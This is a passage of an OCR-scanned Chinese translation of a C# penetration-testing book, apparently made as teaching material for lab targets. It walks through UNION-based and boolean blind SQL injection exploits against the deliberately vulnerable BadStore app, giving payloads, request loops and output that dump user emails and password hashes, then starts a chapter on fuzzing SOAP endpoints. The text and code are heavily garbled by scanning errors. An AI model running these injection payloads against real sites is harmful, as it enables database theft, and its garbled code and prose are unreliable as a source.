中 间 标 记 和 结束 标记 从 匹配 中 捕获 用 户 名 和 密码 散 列 。 然 后 我 们 调用 正则 表达 式 中 的 Matches () 方法 @ 将 响应 数据 作为 参数 
传递 给 Matches () 。Matches () 方法 返回 一 个 MatchCollection 对 象 , 我 们 可 以 使 用 foreach 循 环 遍 历 它 ， 使 用 标记 来 检索 
每 个 与 之 前 创建 的 正则 表达 式 匹 配 的 字符 串 。 


当 迭 代 每 个 表达 陈 匹 配 时 ， 我 们 打印 用 记名 和 密码 散 列 。 使 用 WriteLine () 方法 @ 打 印 值 ， 使 用 表达 陈 匹 配 时 仓储 在 
Groups 属 性 中 的 捕获 用 户 名 @@ 和 密码 @ 的 表达 式 组 来 构建 字符 串 。 


运行 漏洞 利用 程序 将 打印 如 清单 2-38 所 示 的 输出 。 


清单 2-38: 基于 UNION 的 漏洞 利用 的 输出 示例 


Username: AAA Test User Password hash: 098F6BCD4621D373CADE4E832627B4F6 
Username: admin Password hash: 5EBE2294ECDOEOF08EAB7690D2A6EE69 
Username: joe@supplier.com Password hash: 62072d95acb588c7ee9d6fa0c6c85155 
Username: big@spender .com Password hash: 9726255eec083aa56dc0449a21b33190 
--SNnip-- 


Username: tommy@customer.net Password hash: 7f43c1e438dc11a93d19616549d4b701 


你 可 以 看 到 ， 使 用 单一 请 求 ， 我 们 可 以 使 用 UNION SQL 注 入 从 BadStore MySQL 数 据 库 中 的 userdb 表 中 提取 所 有 用 户 名 和 
密码 散 列 值 。 


2.7.3 利用 基于 布尔 的 SQL 注入 


SQL 盲 注 ， 也 称 为 基于 布尔 的 SQL 注入 ， 在 这 种 注入 中 攻击 者 不 会 从 数据 库 直 接 获 取信 息 ， 但 可 以 通过 询问 是 非 题 从 数据 库 


间接 提取 信息 ， 通 单 每 次 1 字 世 。 
SQL 盲 注 的 原理 


SQL 盲 注 需要 比 基 于 UNION 的 注入 更 多 的 代码 以 便 有 效 地 利用 SQL 注 入 漏洞 ， 并 且 因 为 需要 许多 HTTP 请 求 所 以 需要 更 多 的 
时 间 。 与 基于 UNION 的 注入 相 比 ， 它 们 在 服务 器 端 可 能 会 在 日 志 中 留 下 更 多 的 证 据 。 


执行 SQL 言 注 时 ， 不 会 从 Web 应 用 程序 获得 直接 的 反馈 : 你 依赖 于 元 数据 ， 例 如 行为 更 改 以 从 数据 库 中 收集 信息 。 例 如 ， 
通过 使 用 MySQL 关 键 字 RLIKE 来 使 用 正则 表达 式 进 而 匹配 数据 库 中 的 值 ， 如 清单 2-39 所 示 ， 我 们 可 能 会 导致 在 BadStore 中 显示 


二 、 
日 


了 


<HT 


阅 


O 


清单 2-39: 在 Badstore 中 导致 铬 误 的 RLIKE SQL 讶 注 有 效 载 何 


searchquery=fdsa +RLIKE+OXx28+AND+ 


传递 给 BadStore 时 ，RLIKE 会 尝试 把 十 六 进 制 编码 字符 串 当 成 正则 表达 式 解 析 ， 导 致 错误 (参见 清单 2-40) ， 因 为 传 入 的 
字符 串 是 正则 表达 了 式 中 的 一 个 特殊 字符 。 开 括号 [ (] 字 符 (十 六 进 制 0x28) 表示 表达 式 组 的 开头 ， 在 基于 UNION 的 注入 中 我 们 
也 用 于 匹配 用 记名 和 密码 散 列 。 开 括号 的 字符 必须 有 一 个 对 应 的 闭 括号 [) ] 字 符 ， 人 否则 正则 表达 陈 的 语法 将 无 效 。 


清单 2-40: 传递 无 效 的 正则 表达 式 时 RLIKE 友 生 错 误 


Got error ‘parentheses not balanced from regexp 


由 于 缺少 一 个 括号 ， 圆 括号 不 匹配 。 现 在 我 们 知道 可 以 使 用 true 和 false 的 SQL 查询 来 导致 错误 从 而 可 靠 地 控制 BadStore 的 


使 用 RLIKE 创 建 true 和 false 的 响应 


我 们 可 以 在 MySQL 中 使 用 一 个 CASE 语 句 (类 似 于 C 语 言 的 case 语 句 ) 来 确定 为 RLIKE 选 择 一 个 正确 的 或 者 不 正确 的 正则 表 
达 陈 来 解析 。 例 如 ， 清 单 2-41 返 回 啊 应 为 true。 


清单 2-41: 应 该 返回 响应 为 true 的 RLIKE 盲 注 有 效 载 答 


searchquery=fdsa' +RLIKE+(SELECT+(CASE+WHEN+(1=1@ )+THEN+Ox28+ELSE+0xX41+END) )+AND+ 


CASE 语 句 首 先 确定 1=1Q@ 是 否 为 真 。 因 为 这 个 等 式 成 立 ， 所 以 返回 0x28 作 为 RLIKE 尝 试 解析 的 正则 表达 式 ， 但 是 因为 不 是 
有 效 的 正则 表达 式 ，Web 应 用 程序 应 该 抛 出 一 个 错误 ， 如 果 我 们 将 1= 1 修改 为 1=2，0x41 (十 六 进 制 的 大 写字 母 A) 被 返回 以 被 
RLIKE 解 析 ， 并 且 不 会 导致 解析 错误 。 


通过 询问 Web 应 用 程序 是 非 题 (xxx 等 于 xxx 吗 ? ) ， 我 们 可 以 确定 它 的 行为 方式 ， 然 后 根据 该 行为 来 确定 问题 的 答案 是 


true 还 是 false。 
使 用 RLIKE 关 键 字 匹配 搜索 条 件 
对 于 searchquery 参 数 ， 清 单 2-42 中 的 有 效 载 人 答应 该 返回 的 结果 为 true (一 个 错误 ) ， 因 为 userdb 表 中 的 行 数 大 于 1。 
清单 2-42: searchquery 参 数 的 基于 布尔 的 SQL 注 入 有 效 载 从 


searchquery=fdsa'+RLIKE+(SELECT+(CASE+WHEN+( (SELECT+LENGTH(IFNULL(CAST(COUNT(*) 
+AS+CHAR ) , 0x20) )+FROM+uUserdb )=1@ )+THEN+Ox41+ELSE+0x28+END) )+AND+ 


使 用 RLIKE 和 CASE 语 句 ， 我 们 检查 BadStore userdb 的 长 度 是 否 等 于 。COUNT (*) 语句 返回 一 个 整数 ， 它 是 表 中 的 行 
数 。 我 们 可 以 使 用 这 个 数字 来 显 闭 减少 完成 攻击 所 需 的 请 求 数量 。 


如 果 我 们 修改 有 效 载体 来 确定 行 数 的 长 度 是 否 等 于 2 而 不是 1@， 则 服务 器 应 该 返回 一 个 包含 “括号 不 匹配 ”的 错误 的 啊 
应 。 例 如 ，Badstore userdb 表 中 有 999 个 用 户 ， 虽 然 你 可 能 希望 上 友人 送 至 少 1000 个 请 求 以 确定 COUNT (*) 返回 的 数字 是 否 大 于 
999， 但 是 我 们 可 以 对 单独 的 数字 进行 暴力 破解 (每 个 都 是 9) ， 这 比 对 整数 (999) 进行 暴力 破解 快 得 多 。999 的 长 度 是 3， 如 
果 不 暴 力 极 解 整数 999， 而 是 暴力 破解 第 一 ， 第 二 ， 然 后 是 第 三 位 数字 ， 仪 仪 使 用 30 个 请 求 暴 力 破解 瓯 能 得 到 999 一 每 个 数字 


最 多 10 个 请 求 。 


确定 和 打印 userdb 表 中 的 行 数 


为 了 使 这 一 点 更 清楚 ， 编 写 一 个 Main () 方法 来 确定 userdb 表 中 包含 多 少 行 。 使 用 如 清单 2-43 所 示 的 for 循 环 ， 可 以 确定 
Userdb 表 中 包含 的 行 数 的 长 度 。 


清单 2-43: for 循 环 检索 userdb 的 数据 库 个 数 的 长 度 


int countLength = 1; 
for (;;countLength++) 


{ 
string getCountLength = "fdsa' RLIKE (SELECT (CASE WHEN ((SELECT"; 
getCountLength += " LENGTH(IFNULL(CAST(COUNT(*) AS CHAR) ,0Ox20)) FROM"; 
getCountLength += " userdb)="+countLength+") THEN Ox28 ELSE Ox41 END))"; 
getCountLength += ”AND “Le9o = Le9o 


string response = MakeRequest(getCountLength ) ; 
if (response.Contains("parentheses not balanced")) 
break ; 


我 们 以 countLength 为 零 开 始 ， 然 后 通过 循环 每 次 给 countLength 增 加 1， 检 查 对 请 求 的 响应 是 否 包含 字符 串 “ 括 号 不 匹 
配 ”。 如 果 是 这 样 ， 我 们 用 正确 的 countLength 来 结束 for 循 环 ， 这 个 值 应 该 是 23。 


然后 ， 我 们 向 服务 器 询问 userdb 表 中 包含 的 行 数 ， 如 清单 2-44 所 示 。 
清单 2-44: 检索 userdb 表 中 的 行 数 


List<byte> countBytes = new List<byte>(); 
for (int i = 1; i «= countLength; i++) 


{ 
for (int c = 48; C <= 58; C++) 
{ 
string getCount = fdsa RLIKE (SELECT (CASE WHEN (@ORD(@MID((SELECT"; 
getCount += " IFNULL(CAST(COUNT(*) AS CHAR), Ox20) FROM userdb)®©@,"; 
getCount += i@+ ", 1@))="+c@+") THEN Ox28 ELSE Ox41 END)) AND '"; 
string response = MakeRequest (getCount); 
if (response.@Contains("parentheses not balanced")) 
{ 
countBytes.@Add( (byte)c); 
break ; 
} 
} 
} 


清单 2-44 中 使 用 的 SQL 有 效 载 丛 二 用 于 检索 计数 的 以 前 的 SQL 有 效 载 集 有 点 不 同 。 我 们 使 用 SQL 函 数 ORD () @ 和 和 
MID () @。 


ORD () 立 数 将 给 定 的 输入 转换 为 整数 ，MI1D () 函数 将 根据 起 始 索 引 和 返回 长 度 返 回 特定 的 子 字符 串 。 通 过 使 用 这 两 个 
消 数 ， 我 们 可 以 从 SELECT 语 句 返 回 的 字符 串 中 一 次 选择 一 个 字符 ， 并 将 其 转换 为 整数 。 这 人 允许 我 们 将 字符 串 中 的 字 节 的 整数 表 
示 与 当前 交互 中 测试 的 字符 值 进行 比较 。 


MID () 阔 数 有 三 个 参数 : 你 从 子 字 符 捉 中 选择 的 字符 串 @®， 起 始 达 引 (如 你 可 能 期 望 的 ， 从 1 开始 ， 而 不 是 0) @， 以 及 
选择 的 子 串 的 长 度 @@。 注 意 ，MID () 的 第 二 个 参数 @ 由 最 外 面 的 for 循 环 的 当前 迭代 决定 ， 在 其 中 我 们 将 | 增加 到 先前 for 循 环 
中 确定 的 计数 长 度 。 在 我 们 达 代 并 递增 它 的 过 程 中 此 参数 选择 要 测试 的 字符 串 中 的 下 一 个 字符 。 内 部 for 循 环 遍历 等 于 ASCII 字 生 


一 大 大 


0 到 9 的 整数 。 因 为 我 们 只 尝试 在 数据 库 中 获取 行 数 ， 所 以 我 们 只 关心 数字 字符 。 


在 基于 布尔 的 注入 攻击 期 间 ，i@ 和 c@ 变 量 均 在 SQL 有 效 载 何 中 使 用 。 变 量 i 用 作 MID () 函数 中 的 第 二 个 参数 ， 指 定 要 测试 
的 数据 库 值 中 的 字符 位 置 。 变 量 c 是 我 们 将 ORD () 的 结果 进行 比较 的 整数 ， 它 将 MID () 返回 的 字符 转换 为 整数 。 这 人 允许 我 们 
志 历 数据 库 中 给 定 值 中 的 每 个 字符 ， 并 使 用 是 非 题 暴力 破解 该 字符 。 


当 有 效 负 和 载 返 回 错误 “parentheses not balanced”Q@， 我们 知道 索引 i 处 的 字符 等 于 内 部 循环 的 整数 c。 


然后 将 c 转 损 为 一 个 字 节 ， 并 将 其 添加 到 List< byte> @ 人 在 循环 乙 前 实例 化 。 最 后 ， 跳 出 内 循环 来 志 历 外 循环 ， 一 旦 for 循 环 完 


一 </ 


成 ， 我 们 将 List<byte> 转 换 为 可 打印 的 字符 串 。 
然后 将 该 字符 串 打 印 到 屏幕 上 ， 如 清单 2-45 所 示 。 
清单 2-45: 转换 由 SQL 注 入 检索 的 字符 串 并 打印 表 中 的 行 数 


int count = int.Parse(Encoding.ASCIIT.@CGCetString(countBytes.ToArray())); 
Console.WriteLine("There are "+count+" rows in the userdb table"); 


使 用 Encoding.ASCI| 类 的 GetString () 方法 @ 将 countBytes.ToArray () 返回 的 字 节 数组 转换 为 可 读 的 字符 串 。 然 后 将 此 
字符 捉 传 递 给 int.Parse () ， 它 将 解析 字符 串 并 返回 一 个 整数 (如果 该 字符 串 可 以 转换 为 整数 ) 。 然 后 使 用 


Console.WriteLine () 打印 字符 串 。 


MakeRequest () 方法 


我 们 正 准备 运行 漏洞 利用 程序 ， 除 了 另外 一 件 事 情 : 我 们 需要 一 种 在 for 循 环 中 上 友 送 有 效 载 倚 的 万 法 。 为 此 ， 需 要 编写 
MakeRequest () 万 法 ,该 方法 需要 一 个 参数 : 要 友 送 的 有 效 载 何 ( 见 清 单 2-46) 。 


清单 2-46: MakeRequest () 方法 友 送 有 效 载 集 并 返回 服务 器 的 响应 


private static string MakeRequest(string payload) 
{ 


string url = @ http://192.168.1.78/cgi-bin/badstore.cgi?action=search&searchquery="; 
HttpWebRequest request = (HttpWebRequest)WebRequest.@Create(url+payload); 


string response = string.Empty; 
Using (StreamReader reader = new @StreamReader(request.GetResponse().GetResponseStream())) 


response = reader.ReadToEnd(); 


return response,; 


} 


我 们 使 用 有 效 载荷 和 访问 BadSstore 的 URLQ 创 建 一 个 基本 的 GET HttpWebRequest@O。 然 后 我 们 使 用 StreamReaderG) 将 
响应 读 入 一 个 字符 串 ， 并 将 响应 返回 给 调用 者 。 现 在 运行 漏洞 利用 程序 ， 应 该 收 到 如 清单 2-47 所 示 的 输出 。 


清单 2-47: 确定 userdb 表 中 的 行 数 


There are 23 rows in the userdb table 


在 运行 漏洞 利用 程序 的 第 一 部 分 之 后 ， 我 们 看 到 我 们 拥有 23 个 用 户 ， 可 以 从 中 提取 用 户 名 和 密码 散 列 值 。 下 一 部 分 漏洞 利 
用 程序 将 会 提取 实际 的 用 尸 名 和 密码 散 列 值 。 


检索 值 的 长 度 
在 可 以 从 数据 库 中 的 列 中 逐个 字 节 抽取 任何 值 书 前， 我 们 需要 获取 值 的 长 原 。 清 单 2-48 显 示 了 如 何 做 到 这 一 点 。 


清单 2-48: 检索 数据 库 中 某 些 值 的 长 度 


private static int GetLength(int row@, string column®@) 
t 


int countLength = 0; 
for (;; countLength++) 


string getCountLength = "fdsa' RLIKE (SELECT (CASE WHEN ((SELECT"; 


getCountLength += " LENGTH(IFNULL(CAST(@CHAR LENGTH("+column+") AS"; 
getCountLength += " CHAR),Ox20)) FROM userdb ORDER BY email @LIMIT ; 
getCountLength += row+",1)="+countLength+") THEN Ox28 ELSE Ox41 END) ) AND"; 
getCountLength += " YIye = YIye ; 


string response = MakeRequest(getCountLength ) ; 


if (response.Contains("parentheses not balanced")) 
break; 


GetLength () 方法 有 两 个 参数 : 提取 值 的 行 @ 和 值 将 驻 留 在 其 中 的 列 @。 我 们 使 用 for 循 环 (参见 清单 2-49) 来 收集 
Userdb 表 中 行 的 长 度 。 但 是 与 以 前 的 SQL 有 效 载 傈 不同 ， 我 们 使 用 函数 CHAR_LENGTH () @ 而 不 是 LENGTH， 因 为 被 提取 的 
字符 串 可 能 是 16 位 Unicode 而 不 是 8 位 AsCll。 我 们 还 使 用 LIMIT 子 句 @ 来 指定 从 完整 用 己 表 返回 的 特定 行 中 提取 值 。 在 检索 数据 
库 中 的 值 的 长 大 后 ， 可 以 一 次 检索 一 个 字 世 的 值 ， 如 清单 2-49 所 示 。 


清单 2-49: GetLength () 方法 中 的 第 二 个 循环 检索 值 的 实际 长 度 


List<byte> countBytes = @new List<byte> (); 
for (int i = 0; i <= countLength; i++) 


{ 
for (int c = 48; Cc <= 58; C++) 
{ 
string getLength = "fdsa' RLIKE (SELECT (CASE WHEN (ORD(MID((SELECT"; 
getLength += " IFNULL(CAST(CHAR LENGTH(" + column + ") AS CHAR),Ox20) FROM"; 
getLength += " userdb ORDER BY email LIMIT ”+ row + ",1)," + i; 
getLength += ",1))="+c+") THEN Ox28 ELSE Ox41 END)) AND 'YIye'="'YIye"; 
string response = @MakeRequest(getLength); 
if (response.@Contains("parentheses not balanced")) 
countBytes. @Add( (byte)c); 
break; 
} 
} 
} 


如 清单 2-49 所 示 ， 我 们 创建 一 个 通用 的 List< byte> @ 来 存储 由 有 效 载 从 收集 的 值 ， 以 便 可 以 将 它们 转换 为 整数 并 将 其 返回 


给 调用 者 。 当 迁 代 计 数 的 长 度 时 ， 发 送 HTTP 请 求 ， 以 使 用 MakeRequest () @@ 和 SQL 注 入 有 效 载 傈 来 测试 值 中 的 字 节 。 如 果 啊 
应 包含 “parentheses not balanced” 错 误 @， 我 们 知道 我 们 的 SQL 有 效 载 荷 被 评估 为 true。 这 意味 着 需要 将 c (确定 为 匹配 的 
字符 ) 的 值 存储 为 字 节 @@， 以 便 可 以 将 List<byte> 转 换 为 可 读 的 字符 串 。 由 于 我 们 友 现 了 当前 的 字符 ， 所 以 不 需要 再 次 测试 给 
定 的 计数 索引 而 是 跳出 循环 进入 下 一 个 索引 。 


现在 我 们 需要 返回 这 个 计数 并 结束 这 个 方法 ， 如 清单 2-50 所 示 。 
清单 2-50: GetLength () 方法 的 最 后 一 行 ， 将 长 度 的 值 转换 为 整数 并 将 其 返回 


if (countBytes.Count > 0) 

return @int.Parse(Encoding.ASCIT.@GCetString(countBytes.ToArray())); 
else 

return 0; 


一 旦 我 们 有 了 计数 的 字 世 ， 残 可 以 使 用 Getstring () @ 将 收集 的 字 世 转换 成 可 读 的 字符 串 。 此 字符 串 传 递 给 
int.Parse () @ 并 返回 给 调用 者 ， 以 便 我 们 可 以 从 数据 库 开 始 收集 实际 值 。 


编写 GetValue () 以 获取 给 定 值 
我 们 用 GetValue () 方法 完成 这 个 漏洞 利用 程序 ， 如 清单 2-51 所 示 。 


清单 2-51: GetValue () 方法 ， 它 将 检索 给 定 行 中 给 定 列 的 值 


private static string GetValue(int row@, string column@, int length®) 


L 
List<byte> valBytes = @new List<byte>(); 
for (int i = 0; i <= length; i++) 


@for(int c = 32; Cc <= 126; C++) 


{ 
string getChar = "fdsa' RLIKE (SELECT (CASE WHEN (ORD(MID( (SELECT"; 


getChar += " IFNULL(CAST("+column+" AS CHAR) ,0Ox20) FROM userdb ORDER BY"; 
getChar += " email LIMIT "+row+",1),"+i+",1))="+c+") THEN Ox28 ELSE Ox41"; 
getChar += " END)) AND 'YIye'="'YIye"; 

string response = MakeRequest(getChar); 


if (response.Contains(@"parentheses not balanced")) 


valBytes.Add( (byte)c); 
break; 


} 
} 


return Encoding.ASCIIT.@GetString(valBytes.ToArray()); 
} 


GetValue () 方法 需要 三 个 参数 : 我 们 正在 提取 数据 的 行 @， 值 所 在 的 列 @ 以 及 从 数据 库 中 收集 的 值 的 长 度 @。 一 个 新 的 
List<byte> @ 被 实例 化 以 存储 所 收集 的 值 的 字 市 。 


在 最 里 面 的 for 循 环 @ 中 ， 我 们 从 32 友 代 到 126， 因 为 32 是 对 应 于 可 打印 AsCll 字 符 的 最 小 整数 ，126 是 最 大 的 。 在 检索 计数 


之 前 ， 我 们 只 是 从 48 和 迭代 到 ?58， 因 为 我 们 只 天 心 数 字 的 AsCll 字 符 。 


当 疡 历 这 些 值 时 ， 我 们 友 送 一 个 有 效 载体 ， 将 当前 数据 库 中 的 值 的 这 引 与 内 部 for 循 环 的 当前 迭代 值 进行 比较 。 当 返回 啊 应 
时 ,我 们 查找 错误 “parentheses not balanced”Q@， 如 果 找 到 ， 则 将 当前 内 部 迭代 的 值 转换 为 一 个 字 节 ， 并 将 其 存储 在 字 忆 
列表 中 。 该 方法 的 最 后 一 行使 用 Getstring () @ 将 此 列表 转换 为 字符 串 ， 并 将 新 的 字符 串 返 回 给 调用 者 。 


调用 方法 并 打印 人 


现在 剩 下 的 残 是 在 Main () 万 法 中 调用 新 万 法 GetLength () 和 GetValue () ， 并 打印 从 数据 库 中 收集 到 的 值 。 如 清单 2- 
52 所 示 ， 我 们 在 Main () 万 法 的 末尾 添加 了 调用 GetLength () 和 GetValue () 万 法 的 for 循 环 ， 以 便 从 数据 库 中 提取 电子 邮 
件 地 址 和 密码 散 列 值 。 


清单 2-52: 添加 到 Main () 方法 中 的 for 循 环 ， 它 调用 GetLength () 和 GetValue () 方法 


for (int row = 0; row < count; row++) 


foreach (string column in new string[|] {"email", "passwd"}) 
{ 
Console.Write("Getting length of query value... "); 
int valLength = @CetLength(row, column); 
Console.WriteLine(valLength); 


Console.Write("Getting value... "); 
string value = @CGetValue(row, column, valLength); 
Console.WritelLine(value); 


对 于 userdb 表 中 的 每 一 行 ， 我 们 首先 获取 email 字 段 的 长 度 @ 和 值 @@， 然 后 获取 passwd 字 段 的 值 (用 尸 密码 的 MD5 散 列 
值 ) 。 接 下 来 ,我 们 打印 字段 的 长 度 及 其 值 ， 结 果 如 清单 2-53 所 示 。 


清单 2-53: 我 们 的 漏洞 利用 程序 的 结果 


There are 23 rows in the userdb table 

Getting length of query value... 13 

Getting value... AAA Test User 

Getting length of query value... 32 

Getting value... 098F6BCD4621D373CADE4E832627B4F6 
Getting length of query value... 5 

Getting value... admin 

Getting length of query value... 32 

Getting value... 5EBE2294ECDOEOFO8EAB7690D2A6EE69 
--SNn1ip-- 

Getting length of query value... 18 

Getting value... tommy@customer.net 

Getting length of query value... 32 

Getting value... 7f43c1e438dc11a93d19616549d4b701 


在 枚 举 数 据 库 中 的 用 户 数 之 后 ， 我 们 迭代 每 个 用 户 ， 并 从 数据 库 中 提取 用 户 名 和 密码 散 询 。 这 个 过 程 比 我 们 上 面 所 做 的 基于 
UNION 的 注入 慢 得 多 ， 但 是 基于 UNION 的 注入 并 不 总 是 可 用 的 。 了 解 基于 布尔 的 攻击 在 利用 SQL 注入 时 如 何 工 作对 于 有 效 利用 
许多 SQL 注入 至 天 重要 。 


2.8 “本章 小 结 


本 章 介 绍 了 对 XSS 和 SQL 注 入 漏洞 进行 模糊 测试 和 利用 。 正 如 你 所 看 到 的 ，BadStore 包 含 许多 SQL 注 入 、XSS 和 其 他 漏洞 ， 
所 有 漏洞 都 以 不 同 的 方式 被 利用 。 在 本 章 中 ， 我 们 实现 了 一 个 小 的 对 GET 请 求 进行 模糊 测试 的 工具 来 搜索 X93 的 查询 字符 串 参 
数 ， 或 者 可 能 意味 着 仓 企 SQL 注入 漏洞 的 错误 。 使 用 强大 且 灵 活 的 HttpWebRequest 类 来 创建 和 检索 HTTP 请 求 和 响应 ， 我 们 可 
以 确定 在 查找 BadSstore 中 的 项 目 时 searchquery 参 数 容易 受到 XSS 和 SQL 注入 的 攻击 。 


一 旦 编写 了 一 个 简单 的 对 GET 请 求 进行 模糊 测试 的 工具 ， 我 们 束 能 使 用 Burp Suite HTTP 代 理 和 Firefox 从 Badstore 捕 获 
HTTP POST 请 求 ， 以 便 为 POST 请 求 编写 一 个 小 的 模糊 测试 的 工具 。 使 用 与 之 前 的 与 对 GET 请 求 进行 模糊 测试 的 工具 相同 的 类 和 
一 些 新 的 方法 ， 我 们 能 够 友 现 更 多 可 能 锐利 用 的 SQL 注 入 漏洞 。 


接 下 来 我 们 转移 到 更 复杂 的 请 求 ， 例 如 使 用 JSON 的 HTTP 请 求 。 使 用 存在 漏洞 的 JSON Web 应 用 程序 ， 我 们 捕获 了 一 个 用 
于 使 用 Burp Suite 在 Web 应 用 程序 上 创建 新 用 户 的 请 求 。 为 了 有 效 地 对 这 种 类 型 的 HTTP 请 求 进行 模糊 测试 ， 我 们 介绍 了 
Json.NET 库 ， 这 使 得 解析 和 使 用 JSON 数 据 更 加 容易 。 


最 后 ， 一 旦 你 理解 了 模糊 测试 工具 是 如 何 上 发 现 Web 应 用 程序 中 可 能 的 漏洞 的 ， 你 也 融 学 会 了 如 何 利用 这 些 漏洞 。 再 次 使 用 
Badstore， 我 们 编写 了 一 个 基于 UNION 的 SQL 注入 漏洞 利用 程序 ， 可 以 通过 一 个 HTTP 请 求 在 Badstore 数 据 库 中 提取 用 户 名 和 
密码 散 列 值 。 为 了 有 效 地 将 提取 的 数据 从 服务 器 返回 的 HTML 中 提取 出 来 ， 我 们 使 用 正则 表达 式 类 Regex、Match 和 
MatchCollection, 


一 旦 成 功利 用 了 更 简单 的 基于 UNION 的 注入 ， 我 们 就 在 相同 的 HTTP 请 求 上 写 了 一 个 基于 布尔 的 SQL 盲 注 利 用 程序 。 使 用 
HttpWebRequest 类 ,我 们 基于 传递 给 Web 应 用 程序 的 SQL 注 入 有 效 载 丛 来 确定 哪些 HTTP 响 应 是 true 或 false。 当 我 们 知道 Web 
应 用 程序 如 何 响应 是 非 题 时 ， 便 开始 询问 数据 库 是 非 题 ， 以 便 一 次 收 到 1 个 字 节 的 信息 。 基 于 布尔 的 盲 注 比 基于 UNION 的 注入 
更 复杂 ， 它 需要 更 多 的 时 间 和 和 HTTP 请求 才能 完成 ， 但 是 在 不 人 存在 基于 UNION 的 注入 时 尤其 有 用 。 


第 3 章 ”对 SOAP 终 端 进行 模糊 测试 


作为 渗透 测试 人 员 ， 你 可 能 会 遇 到 通过 SOAP 终 端 提供 编程 API 访 问 的 应 用 程序 或 服务 器 。 简 单 对 象 访问 协议 (Simple 
Object Access Protocol，SOAP) ， 是 一 种 常见 的 语言 无 天 的 访问 编程 API 的 企业 技术 。 一 般 来 癌 ，SOAP 通 过 HTTP 协 议 使 
用 ， 它 使 用 XML 来 组 织 上 及 送 到 SOAP 服 务 器 和 从 SOAP 服 务 器 上 友 运 的 数据 。Web 服 务 摘 述 语言 (Web serviceDescription 
Language，WSDL) 摘 述 了 通过 SOAP 终 端 公开 的 方法 和 功能 。 默 认 情况 下 ，SOAP 终 端 公开 WSDL XML 文档 使 客户 端 可 以 轻 
松 地 解析 以 便 与 SOAP 终 端 进行 交互 。 而 C# 有 几 个 类 可 以 实现 这 一 点 。 


本 章 基 于 如 何 编程 处 理 HTTP 请 求 以 检测 XSs 和 SQL 注入 漏洞 的 知识 ， 但 重点 是 SOAP XML。 本 章 还 展示 了 如 何 编写 一 个 小 
型 的 模糊 测试 工具 来 下 载 和 解析 由 SOAP 终 端 暴露 的 WSDL 广 件 ， 然 后 使 用 WSDL 文 件 中 的 信息 为 SOAP 服 务 生成 HTTP 请 求 。 最 
终 ， 你 将 能 够 系统 并 自动 地 查找 SOAP 方 法 中 可 能 的 SQL 注入 漏洞 。 


3.1 设置 吻 受 攻击 的 终 痛 


本 章 将 使 用 VulnHub 网 站 (http://www.vulnhub.com/) 上 提供 的 名 为 CsharpVulnSoap (扩展 名 为 .ova) 的 预 配置 虚 拟 
设备 中 易 受 攻击 的 终端 。 下 载 后 可 以 通过 双击 它 将 其 导入 大 多 数 操作 系统 的 VirtualBox 或 VMware。 安 疼 后 ， 使 用 密码 
password 或 使 用 访客 会 话 来 登录 终端 。 从 那里 输入 ifconfig 以 上 友 现 虚拟 设备 的 I|P 地 址 。 默 认 情 况 下 ， 本 设备 将 监听 主机 专用 接 
口 ， 与 之 前 的 章节 中 桥接 的 网 络 接口 不 同 。 


人 在 Web 浏 览 器 中 打开 终端 ， 如 图 3-1 所 示 ， 可 以 使 用 屏幕 左 侧 的 菜单 项 (AddUser、ListUsers、GetUser 和 DeleteUser) 至 
看 在 使 用 时 返回 的 SOAP 终 病 公 开 的 功能 。 浏 览 http://<ip>/Vulnerable.asmx?WSDL 应 该 会 有 一 个 WSDL 文 档 ， 以 可 解析 的 
XM | 方式 摘 述 可 用 的 为 数 。 下 面 来 研究 这 个 文件 的 结构 。 


VulnerableService Web Service 


VulnerableService Web Service 


| ) @@ 192.168.2.101/Vulnerable.asmx Ty vo | | Rv Google 


Web Service 


VulnerableService 


Web Service Overview 


Description has not been provided 


Basic Profile Conformance 


This web service does not conform to WS-| Basic Profile v1.1 
$ R2112: In aDESCRIPTION, slements SHOULD NOT be named using the conveniion AmayOfXXX. 
心 xmischemaElement in Schema Schema httpJhtempuriorg, in Service Description 中 tp-itermnpuriorgy 


Methods for binding 
VulnarableServiceSoapi12 
AddUser 


Listljsesrs 


图 3-1 火狐 浏览 器 中 有 漏洞 的 终端 


3.2 解析 WSDL 


WSDL XML 文 档 有 点 复杂 。 即 使 像 我 们 将 要 解析 的 简单 的 WSDL 文 档 也 不 简单 。 然 而 ， 由 于 C# 具 有 用 于 解析 和 使 用 XML 文 
件 的 优秀 的 类 ， 将 WSDL 正 确 解析 并 使 其 能 够 以 面向 对 象 的 方式 与 SOAP 服 务 进行 交互 还 是 可 以 实现 的 。 


A 一 一 上 一 


WasDL 广 档 本 质 上 是 一 堆 XML 元 素 ， 它 们 从 文档 的 底部 到 顶部 以 逻辑 万 式 彼此 相关 。 在 文档 的 底部 ， 你 可 以 与 服务 进行 交互 
以 同 终端 友 出 请 求 。 从 服务 的 角度 来 看 有 端口 的 概念 ， 这 些 端 口 指向 绑 定 ， 后 者 又 指向 端口 类 型 。 端 口 类 型 包含 该 端点 上 可 用 的 
操作 (或 方法 ) 。 操 作 包 仿 一 个 输入 和 一 个 输出 ， 它 们 都 指向 一 个 消息 。 消 息 指向 一 个 类 型 ， 该 类 型 包 合 调用 该 方法 所 需 的 参 


数 。 图 3-2 可 视 化 地 解释 了 这 个 概念 。 


潭 口 


图 3-2”WSDL 文 档 的 基本 逻辑 布局 


我 们 的 WSDL 类 构造 函数 将 以 相反 的 顺序 工作 。 首 先 ， 创 建构 造 函 数 ， 然 后 创建 一 个 类 来 处 理 WSDL 文 档 从 类 型 到 服务 每 个 


部 分 的 解析 。 


3.2.1 ”为 WSDL 文档 编写 一 个 类 


当 你 编程 解析 WSDL 时 ， 最 简单 的 方法 是 使 用 SOAP 类 型 从 文档 的 顶端 开始 直到 文档 的 下 万。 我 们 创建 一 个 名 为 WSDL 的 
类 ， 其 中 包 仿 WSDL 文档。 构造 消 数 相对 简单 ， 如 清单 3-1 所 示 。 


_ 


清单 3-1: WSDL 类 构造 销 数 


public WSDL (XmlDocument doc) 


L 


XmlNamespaceManager nsManager = new @XmlNamespaceManager(doc.NameTable); 
nsManager.@AddNamespace("wsdl", doc.DocumentElement.NamespaceURI); 
nsManager.AddNamespace("xs", "http://www.w3.0org/2001/XMLSchema"); 


ParseTypes(doc, nsManager); 

ParseMessages(doc, nsManager); 
ParsePortTypes(doc, nsManager); 
ParseBindings(doc, nsManager); 


ParseServices(doc, nsManager); 


我 们 的 WSsDL 类 的 构造 函数 只 需要 一 些 方法 ( 接 下 来 将 会 编写 ) ， 并且 期 望 将 检索 到 的 包 售 Web 服 务 的 所 有 定义 的 XML 文 
